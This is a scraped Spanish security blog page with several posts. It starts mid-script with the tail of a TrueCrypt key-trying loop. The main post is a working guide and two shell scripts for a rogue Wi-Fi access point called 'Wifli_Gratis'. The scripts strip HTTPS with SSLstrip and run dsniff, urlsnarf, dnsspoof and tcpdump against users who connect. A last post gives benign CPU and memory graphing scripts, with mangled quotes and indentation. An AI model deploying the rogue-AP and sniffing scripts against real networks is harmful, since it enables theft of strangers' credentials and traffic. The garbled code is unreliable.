 then
  echo -e "\n[+] KEY FOUND! ==> $i\n"
  $TRUECRYPT --text --non-interactive --volume-properties "$1"

  echo -e "[+] Demounting...\c"
  $TRUECRYPT --text --non-interactive -d "$1"
  echo "OK"

  break
 elif [ `echo "$RES" | grep -ic "create ioctl failed"` -ge 1 ]
 then
  echo -e "\n[+] POSSIBLE KEY FOUND! ==> $i"
  echo -e "\t- Still working..."
 fi

done

IFS="$IFSaux"

echo -e "\n[+] Finished!\n"

unset IFSaux RES TRUECRYPT i
exit 0

Creando un punto de acceso falso – II

October 5th, 2009 11 comments

Post Actualizado: http://safetybits.net/2011/03/30/howto-rogue-ap/

Hace algún tiempo escribí un artículo a modo de manual con un script final para crear puntos de acceso falso usando airbase-ng.

En este segundo artículo, voy a resumir brevemente los pasos mencionados en el primer artículo y mostrar diferentes caminos y algunas aplicaciones finales.

Lo primero será instalar los servidores DHCP y DNS necesarios, y ajustar su configuración. En este caso usaré como servidor DHCP “dhcp3-server” y como servidor DNS “bind9″.

Dado que queremos ofrecer conexión a internet a los clientes, debemos configurar el servidor DHCP para usar los rangos de IP que creamos más convenientes, en el archivo /etc/dhcp3/dhcpd.conf, en mi caso queda así:

ddns-update-style none;
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.33 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}

Para ahorrarnos problemas, nos aseguramos de que ambos demonios están detenidos:

/etc/init.d/dhcp3-server stop
/etc/init.d/bind9 stop

Acto seguido, ajustaremos los parámetros de “airbase-ng” en función a lo que queramos hacer, en mi caso crearé un AP con cifrado WEP, por lo que los pasos para montar el AP serán:

  1. airbase-ng -I 100 -P -C 2 -c 6 –essid Wifli_Gratis rausb0 -w 5A303031333439454430374333
  2. ifconfig at0 10.0.0.1 up
  3. dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
  4. sysctl net.ipv4.ip_forward=1
  5. iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
  6. /etc/init.d/bind9 start

Listo, con esto ya tendremos la red creada y proporcionaremos acceso a internet a los clientes:

Cell 06 – Address: XX:XX:XX:XX:XX:XX
ESSID:”Wifli”
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=96/100  Signal level=-31 dBm  Noise level=-127 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=ffffffffd4670326

Una vez tenemos a los clientes conectados, vamos con lo siguiente:

SSLstrip: Suplanta sesiones web HTTPS por HTTP

$ sudo apt-get install python python-twisted-web
$ wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz && tar xf sslstrip-0.6.tar.gz

DSniff: Suite – Principalmente usaremos ‘dsniff’, ‘urlsnarf’ y ‘dnsspoof’ para suplantar nombres de dominio

  • Para distribuciones basadas en Debian: $ sudo apt-get install dsniff
  • Fuentes: http://monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

p0f: Detección de SO pasivo

  • Para distribuciones basadas en Debian: $ sudo apt-get install p0f
  • Fuentes: http://lcamtuf.coredump.cx/p0f.tgz

TCPTrack: Monitor de conexiones TCP

  • Para distribuciones basadas en Debian: $ sudo apt-get install tcptrack
  • Fuentes: http://www.rhythm.cx/~steve/devel/tcptrack/release/1.2.0/source/tcptrack-1.2.0.tar.gz

Para comenzar está bien, aunque siempre podemos ponernos más “juguetones” y que el tráfico de red crezca de una manera descontrolada, usando karmetasploit.

Script para crear el AP:

#!/bin/sh
#
# Scriwap 1.5 - Script to create rogue AP
#
# Chema Garcia (a.k.a. sch3m4)
# [email protected]
# http://safetybits.net
#

RUTA_AIRBASE='/usr/local/sbin/airbase-ng'
RUTA_BIND9='/etc/init.d/bind9'
RUTA_DHCPD3S='/etc/init.d/dhcp3-server'
RUTA_DHCPD3='/usr/sbin/dhcpd3'
RUTA_CFG_DHCPD3='/etc/dhcp3/dhcpd.conf'
RUTA_SYSCTL='/sbin/sysctl'
RUTA_IPTABLES='/sbin/iptables'
AIRBASE_IFACE='at0'
LOG='.scriwap.log'

function check
{
 if [ ! $? -eq 0 ]
 then
 echo -e "[!] Error - Check "$LOG""
 exit $?
 fi
}

echo "###############################"
echo "#        SCRIWAP 1.5          #"
echo "#=============================#"
echo "#  Chema Garcia (aka sch3m4)  #"
echo "#      [email protected] #"
echo "#      http://safetybits.net      #"
echo "###############################"
echo ""

if [ $# -lt 4 ]
then
 echo -e "Use: $0 <iface_inet> <iface_monitor> <ip_gw> <netmask> <airbase_opt>\n"
 echo -e "Ej: $0 wlan0 rausb0 10.0.0.1 255.0.0.0 -P -C 2 -c 6 --essid Wifli\n"
 exit 1
fi

if [ ! $UID -eq 0 ]
then
 sudo ls / 2>&1 >/dev/null
fi

#comienzo de parametros de airbase
ifacenet=$1
ifacemon=$2
ip=$3
mascara=$4
narg=$#
num=5

while [ $# -gt 0 ] && [ $num -le $narg ];do
 param="$param $5"
 shift
 num=$(($num+1))
done
param="$param $ifacemon"

#Activamos el IP Forwarding
echo "[+] Setting up IP Forwarding"
sudo $RUTA_SYSCTL net.ipv4.ip_forward=1 2>&1 >> $LOG
check

echo "[+] Stopping DHCP daemon"
sudo $RUTA_DHCPD3S stop 2>&1 >> $LOG
echo "[+] Stopping DNS daemon"
sudo $RUTA_BIND9 stop 2>&1 >> $LOG

echo "[+] Flushing 'nat' table"
sudo $RUTA_IPTABLES -t nat -F
check

echo "[+] Adding iptables rule"
sudo $RUTA_IPTABLES -t nat -A POSTROUTING -o $ifacenet -j MASQUERADE
check

echo "[+] Setting up Acces Point..."
sudo rmmod tun 2>&1 >> $LOG
xterm -e sudo $RUTA_AIRBASE $param &
sleep 3

echo "[+] Settin up interface $AIRBASE_IFACE"
sudo ifconfig $AIRBASE_IFACE $ip netmask $mascara up
check

echo "[+] Starting DHCP daemon"
sudo $RUTA_DHCPD3 -cf $RUTA_CFG_DHCPD3 $AIRBASE_IFACE 2>&1 >> $LOG
check

echo "[+] Starting DNS daemon"
sudo $RUTA_BIND9 start 2>&1 >> $LOG
check

echo -e "\n[+] Finished!\n"

exit 0

Script para lanzar las herramientas:

#!/bin/bash
#
# Chema Garcia (a.k.a. sch3m4)
# [email protected]
# http://safetybits.net
#

RUTA_IPTABLES='/sbin/iptables'
RUTA_SSLSTRIP='/home/sch3m4/FakeAP/sslstrip-0.6/sslstrip.py'
RUTA_DSNIFF='/usr/sbin/dsniff'
RUTA_URLSNARF='/usr/sbin/urlsnarf'
RUTA_DNSSPOOF='/usr/sbin/dnsspoof'
RUTA_P0F='/usr/sbin/p0f'
RUTA_TCPTRACK='/usr/bin/tcptrack'
RUTA_TCPDUMP='/usr/sbin/tcpdump'
PUERTO='4664'
RUTA_HOSTSDNS='' # You have to create a file to use dnsspoof

if [ ! $# -eq 1 ]
then
 echo -e "\nUse: $0 <iface>\n"
 exit 1
fi

if [ ! $UID -eq 0 ]
then
 sudo ls / 2>&1 >/dev/null
fi

echo -e "[?] Do you want to save the capture using tcpdump? (y/n): \c"
read SAVE

if [ "$SAVE" == 'y' ] || [ y"$SAVE" == 'y' ]
then
 SAVE_FILE=''
 while [ -z "$SAVE_FILE" ]
 do
 echo -e "[?] Filename: \c"
 read SAVE_FILE
 done
else
 SAVE_FILE=''
fi

echo '[+] Adding iptables rule'
sudo $RUTA_IPTABLES -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $PUERTO

echo -e '[+] Launching SSLstrip...\c'
xterm -e sudo $RUTA_SSLSTRIP -l $PUERTO &
echo 'OK'

echo -e '[+] Launching Dsniff...\c'
xterm -e sudo $RUTA_DSNIFF -i $1 &
echo 'OK'

if [ ! -z "$RUTA_HOSTSDNS" ]
then
 echo -e '[+] Launching DNSspoof...\c'
 xterm -e sudo $RUTA_DNSSPOOF -i $1 -f $RUTA_HOSTSDNS &
 echo 'OK'
fi

echo -e '[+] Launching p0f...\c'
xterm -e sudo $RUTA_P0F -i $1 -U -t &
echo 'OK'

echo -e '[+] Launching TCPtrack...\c'
xterm -e sudo $RUTA_TCPTRACK -i $1 &
echo 'OK'

echo -e '[+] Launching URLsnarf...\c'
xterm -e sudo $RUTA_URLSNARF -i $1 &
echo 'OK'

if [ ! -z "$SAVE_FILE" ]
then
 echo -e '[+] Launching TCPDump...\c'
 xterm -e sudo $RUTA_TCPDUMP -i $1 -w $SAVE_FILE &
 echo 'OK'
fi

exit 0

Ambos scripts están disponibles en:

http://pastebin.com/f671cce89
http://pastebin.com/f332a2d1a

Gráficas de rendimiento – Consumo de %CPU y Memoria

May 30th, 2009 6 comments

Sí, este post también habla sobre desarrollo en GNU/Linux… Cuando desarrollamos una aplicación, puede que nos guste/necesitemos ver el rendimiento de esta, así que buscando sobre cómo podría monitorizar el tiempo de CPU y el uso de memoria de una aplicación, me encuentro sin querer con aplicaciones como Cacti, MRTG, a demás de los administradores de taréas de cada uno de los entornos de escritorio de GNU/Linux y todos y cada uno de sus plugins, versiones, modificaciones, changelogs, etc. Pero lo que realmente andaba buscando era algo mucho más simple, alguna utilidad que me permitiese generar una gráfica simple del consumo de CPU y memoria de X programa, así que al no encontrarlo, decidí utilizar un script en python que encontré en un foro, para medir el uso total de la memoria usada por cada uno de los procesos, y escribir algunos scripts para crearme la herramienta que necesitaba, ayudado por gnuplot, para crear gráficas como esta:

1

Aquí os dejo los scripts:

ps_mem.py

#!/usr/bin/env python

# Try to determine how much RAM is currently being used per program.
# Note the per program, not per process. So for example this script
# will report mem used by all httpd process together. In detail it reports:
# sum(all RSS for process instances) + max(shared mem for any process instance)
#
# The shared calculation below will factor out shared text and
# libs etc. within a program, but not between programs. So there
# will always be some overestimation. This will be the same for
# all processes that just use libc for e.g. but more for others
# that use larger shared libs like gnome, kde etc.

# Author: [email protected]

# V1.0      06 Jul 2005    Initial release
# V1.1      11 Aug 2006    root permission required for accuracy
# V1.2      08 Nov 2006    Add total to output
#                          Use KiB,MiB,… for units rather than K,M,…
# V1.3      22 Nov 2006    Ignore shared col from /proc/$pid/statm for
#                          2.6 kernels up to and including 2.6.9.
#                          There it represented the total file backed extent
# V1.4      23 Nov 2006    Remove total from output as it’s meaningless
#                          (the shared values overlap with other programs).
#                          Display the shared column. This extra info is
#                          useful, especially as it overlaps between programs.
# V1.5      26 Mar 2007    Remove redundant recursion from human()
# V1.6      05 Jun 2007    Also report number of processes with a given name.
#                          Patch from [email protected]

# Notes:
#
# All interpreted programs where the interpreter is started
# by the shell or with env, will be merged to the interpreter
# (as that’s what’s given to exec). For e.g. all python programs
# starting with “#!/usr/bin/env python” will be grouped under python.
# You can change this by changing comm= to args= below but that will
# have the undesirable affect of splitting up programs started with
# differing parameters (for e.g. mingetty tty[1-6]).
#
# For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels
# (rmap vm without smaps) it can not be accurately determined how many pages
# are shared between processes in general or within a program in our case:
# http://lkml.org/lkml/2005/7/6/250
# A warning is printed if overestimation is possible.
# In addition for 2.6 kernels up to 2.6.9 inclusive, the shared
# value in /proc/$pid/statm is the total file-backed extent of a process.
# We ignore that, introducing more overestimation, again printing a warning.
#
# I don’t take account of memory allocated for a program
# by other programs. For e.g. memory used in the X server for
# a program could be determined, but is not.
#
# This script assumes threads are already merged by ps

# TODO:
#
# use ps just to enumerate the pids and names
# so as to remove the race between reading rss and shared values

import sys, os, string

if os.geteuid() != 0:
sys.stderr.write(“Sorry, root permission required.\n”);
sys.exit(1)

PAGESIZE=os.sysconf(“SC_PAGE_SIZE”)/1024 #KiB
our_pid=os.getpid()

#(major,minor,release)
def kernel_ver():
kv=open(“/proc/sys/kernel/osrelease”).readline().split(“.”)[:3]
for char in “-_”:
kv[2]=kv[2].split(char)[0]
return (int(kv[0]), int(kv[1]), int(kv[2]))

kv=kernel_ver()

def getShared(pid):
if os.path.exists(“/proc/”+str(pid)+”/smaps”):
shared_lines=[line
for line in open("/proc/"+str(pid)+"/smaps").readlines()
if line.find("Shared")!=-1]
return sum([int(line.split()[1]) for line in shared_lines])
elif (2,6,1) <= kv <= (2,6,9):
return 0 #lots of overestimation, but what can we do?
else:
return int(open(“/proc/”+str(pid)+”/statm”).readline().split()[2])*PAGESIZE

cmds={}
shareds={}
count={}
for line in os.popen(“ps -e -o rss=,pid=,comm=”).readlines():
size, pid, cmd = map(string.strip,line.strip().split(None,2))
if int(pid) == our_pid:
continue #no point counting this process
try:
shared=getShared(pid)
except:
continue #ps gone away
if shareds.get(cmd):
if shareds[cmd] < shared:
shareds[cmd]=shared
else:
shareds[cmd]=shared
#Note shared is always a subset of rss (trs is not always)
cmds[cmd]=cmds.setdefault(cmd,0)+int(size)-shared
if count.has_key(cmd):
count[cmd] += 1
else:
count[cmd] = 1

#Add max shared mem for each program
for cmd in cmds.keys():
cmds[cmd]=cmds[cmd]+shareds[cmd]

sort_list = cmds.items()
sort_list.sort(lambda x,y:cmp(x[1],y[1]))
sort_list=filter(lambda x:x[1],sort_list) #get rid of zero sized processes (kernel threads)

#The following matches “du -h” output
#see also human.py
def human(num, power=”Ki”):
powers=["Ki","Mi","Gi","Ti"]
while num >= 1000: #4 digits
num /= 1024.0
power=powers[powers.index(power)+1]
return “%.1f %s” % (num,power)

def cmd_with_count(cmd, count):
if count>1:
return “%s (%u)” % (cmd, count)
else:
return cmd
print ” Private  +  Shared  =  RAM used\tProgram \n”
for cmd in sort_list:
print “%8sB + %8sB = %8sB\t%s” % (human(cmd[1]-shareds[cmd[0]]), human(shareds[cmd[0]]), human(cmd[1]),
cmd_with_count(cmd[0], count[cmd[0]]))
print “\n Private  +  Shared  =  RAM used\tProgram \n”

#Warn of possible inaccuracies
#1 = accurate
#0 = some shared mem not reported
#-1= all shared mem not reported
def shared_val_accurate():
“”"http://wiki.apache.org/spamassassin/TopSharedMemoryBug”"”
if kv[:2] == (2,4):
if open(“/proc/meminfo”).read().find(“Inact_”) == -1:
return 1
return 0
elif kv[:2] == (2,6):
if os.path.exists(“/proc/”+str(os.getpid())+”/smaps”):
return 1
if (2,6,1) <= kv <= (2,6,9):
return -1
return 0
else:
return 1

vm_accuracy = shared_val_accurate()
if vm_accuracy == -1:
sys.stderr.write(“Warning: Shared memory is not reported by this system.\n”)
sys.stderr.write(“Values reported will be too large.\n”)
elif vm_accuracy == 0:
sys.stderr.write(“Warning: Shared memory is not reported accurately by this system.\n”)
sys.stderr.write(“Values reported could be too large.\n”)

datos.sh

#!/bin/bash

if [ ! $# -eq 2 ]
then
echo “Uso: $0 <proceso> <iteraciones>”
exit 1
fi

PID=`ps -e | grep $1 | awk ‘{print $1}’`

if [ -z "$PID" ]
then
echo “Proceso $1 no encontrado”
unset PID
exit 2
fi

PS_MEM=”./ps_mem.py”
ARCHIVOM=”/tmp/memoria.dat”
ARCHIVOC=”/tmp/cpu.dat”

rm -f “$ARCHIVOC” “$ARCHIVOM”

cont=0
while [ $cont -lt $2 ]
do
#uso de memoria
dMEM=`”$PS_MEM” | grep “$1″ | awk ‘{print \$7}’`
if [ -z "$dMEM" ]
then
dMEM=0
fi
echo $dMEM >> “$ARCHIVOM”

#quantum de CPU
dCPU=`top -n1 -p $PID | grep “$1″ | tr -s ” *” ‘;’ | awk -F\; ‘{print \$10}’`
if [ -z "$dCPU" ]
then
dCPU=0
fi
echo $dCPU >> “$ARCHIVOC”

echo “$cont) Memoria (MB): $dMEM | %CPU: $dCPU”
let cont=cont+1
done

unset dCPU cont dMEM ARCHIVOC ARCHIVOM PS_MEM PID
exit 0

grafica.sh

#!/bin/sh

if [ ! $# -eq 1 ]
then
echo “Uso: $0 ”
exit 1
fi

ARCHIVOM=”/tmp/memoria.dat”
ARCHIVOC=”/tmp/cpu.dat”

if [ ! -f "$ARCHIVOM" ] || [ ! -f "$ARCHIVOC" ]
then
echo “No se encuentran $ARCHIVOM , $ARCHIVOC”
unset ARCHIVOM ARCHIVOC
exit 2
fi

TMPM=”/tmp/mtmp.dat”
TMPC=”/tmp/ctmp.dat”

cont=0;
while read line; do
echo $cont ${line#*\ };
cont=$(( $cont + 1 ));
done < $ARCHIVOM > $TMPM

cont=0;
while read line; do
echo $cont ${line#*\ };
cont=$(( $cont + 1 ));
done < $ARCHIVOC > $TMPC

PLOT=”/tmp/gp1.dat”

rm -f “$PLOT” “$1″

echo “set terminal png” > $PLOT
echo “set title \”RENDIMIENTO\”" >> $PLOT
echo “set grid” >> $PLOT
echo “set ylabel \”Consumo\”" >> $PLOT
echo “set xlabel \”Tiempo\”" >> $PLOT
echo “set output \”$1\”" >> $PLOT
echo “plot \”$TMPM\” w lines title \”Memoria (MB)\”,\”$TMPC\” w lines title \”Uso %CPU\”" >> $PLOT

gnuplot $PLOT

rm -f “$PLOT” “$TMPM” “$TMPC”
unset ARCHIVO TMPM TMPC cont PLOT
exit 0

rendimiento.sh

#!/bin/bash

VISOR=”gpicview ”
if [ ! $# -eq 3 ]
then
echo “Uso: $0

unset VISOR
exit 1
fi

DATOS=”./datos.sh”
GRAFICA=”./grafica.sh”

if [ ! -f "$DATOS" ] || [ ! -f "$GRAFICA" ]
then
echo “No se encuentran \”$DATOS\” , \”$GRAFICA\”"
unset DATOS GRAFICA VISOR
exit 1
fi

$DATOS $1 $3

echo -e “\nGenerando grafica…”
$GRAFICA $2
unset DATOS GRAFICA

echo ‘Visualizando…’
$VISOR $2 &

unset VISOR
exit 0

El script principal es rendimiento.sh al que deben pasársele como argumentos el nombre del proceso, la ruta de la imagen de destino, y el número de iteraciones para recabar información sobre el consumo de CPU y memoria. Después de esto usará gnuplot para crear la gráfica y el visor especificado en “rendimiento.sh” para visualizar la imagen.

Un ejemplo sería este: ./rendimiento.sh Xorg ./grf_xorg.png 30

Categories: Bash Script, GNU/Linux, Programacion Tags: